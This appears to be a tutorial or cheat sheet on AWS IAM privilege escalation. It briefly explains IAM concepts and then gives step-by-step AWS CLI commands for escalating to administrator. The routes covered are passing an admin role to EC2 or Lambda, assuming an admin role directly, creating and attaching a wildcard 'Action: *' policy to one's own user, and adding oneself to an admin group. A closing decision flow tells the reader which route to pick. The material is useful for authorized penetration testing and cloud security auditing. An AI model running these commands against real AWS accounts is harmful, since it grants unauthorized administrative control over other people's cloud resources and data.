1. Key AWS Concepts
1) IAM (Identity and Access Management)
- Users: Actual people or systems who access AWS
- Roles: Permission sets that can be assumed temporarily.
- Policies: JSON documents that define what actions are allowed or denied.
- Groups: Collections of users that share permissions
2) Important AWS Services for Privilege Escalation
- STS (Security Token Service): Used to assume roles
- EC2: Virtual machines running on AWS.
- Lambda: Serverless functions
- IAM: Manages user, role, and group permissions
2. Checking IAM Policies & Determining Privilege Escalation Paths
1) Check Attached Policies
aws iam list-attached-user-policies --user-name myuser- Example Output:
{
"AttachedPolicies": [
{
"PolicyName": "MyCustomPolicy",
"PolicyArn": "arn:aws:iam::123456789012:policy/MyCustomPolicy"
}
]
}
2) Check Policy Details
aws iam get-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/MyCustomPolicy \
--version-id v1- To find the version ID:
aws iam list-policy-versions --policy-arn arn:aws:iam::123456789012:policy/MyCustomPolicy
3) Choose privilege escalation techniques based on the output
(1) iam:PassRole
- Attach an admin role to an AWS service.
{
"Action": "iam:PassRole",
"Resource": "*"
}
a. Path1 - ec2:RunInstances
- Attach an admin role to a EC2 instance
a) Check EC2 Permissions
aws iam simulate-principal-policy \
--policy-arn arn:aws:iam::123456789012:policy/MyPolicy \
--action-names ec2:RunInstances
b) Run an EC2 instance with admin role
aws ec2 run-instances \
--image-id ami-12345678 \
--instance-type t2.micro \
--iam-instance-profile Name=AdminRole \
--key-name MyKey \
--security-groups default
b. Path2 - lambda:CreateFunction + lambda:InvokeFunction
- Execute code as admin via Lambda
a) Check lambda permissions
aws iam simulate-principal-policy \
--policy-arn arn:aws:iam::123456789012:policy/MyPolicy \
--action-names lambda:CreateFunction lambda:InvokeFunction
b) Create a Lambda function with admin role
aws lambda create-function \
--function-name escalateMe \
--runtime python3.8 \
--role arn:aws:iam::123456789012:role/AdminRole \
--handler lambda_function.lambda_handler \
--zip-file fileb://function.zip
c) Invoke the lambda function
aws lambda invoke --function-name escalateMe output.txt
(2) sts:AssumeRole
- Directly assume an admin role
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/AdminRole --role-session-name tryit
- If successful, the output provides temporary admin credentials
- Export them as environment variables to use the new permissions in your session.
export AWS_ACCESS_KEY_ID="Your_Access_Key_ID"
export AWS_SECRET_ACCESS_KEY="Your_Secret_Access_Key"
export AWS_SESSION_TOKEN="Your_Session_Token"(3) iam:CreatePolicy + iam:AttachUserPolicy
- Create a new admin policy and attach to yourself
a. Create an admin policy json file
echo '{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}' > admin-policy.json
b. Upload the new policy to AWS
aws iam create-policy \
--policy-name MyAdminPolicy \
--policy-document file://admin-policy.json
c. Attach the policy to your account
aws iam attach-user-policy \
--user-name myuser \
--policy-arn arn:aws:iam::123456789012:policy/MyAdminPolicy
d. Verify you have admin permissions
aws iam list-attached-user-policies --user-name myuser
(4) iam: AddUserToGroup
- Add yourself to an admin group
a. Check available groups
aws iam list-groups
b. Check if a group has admin privileges
aws iam list-attached-group-policies --group-name AdminGroup
c. Add yourself to an admin group
aws iam add-user-to-group --user-name myuser --group-name AdminGroup
d. Verify you are in the admin group
aws iam list-groups-for-user --user-name myuser
3. Full Privilege Escalation Flow
1) Check attached policies
(1) AdministratorAccess exists -> You are already admin.
(2) 'iam:PassRole' exists?
a. 'ec2:RunInstances' allowed -> Use EC2 method
b. 'lambda:CreateFunction' allowed -> Use Lambda method
(3) 'sts:AssumeRole' exists? -> Assume the role directly
(4) 'iam:CreatePolicy' + 'iam:AttachUserPolicy' exists? -> Create and attach an admin policy
(5) 'iam:AddUserToGroup' exists? -> Add yourself to the admin group
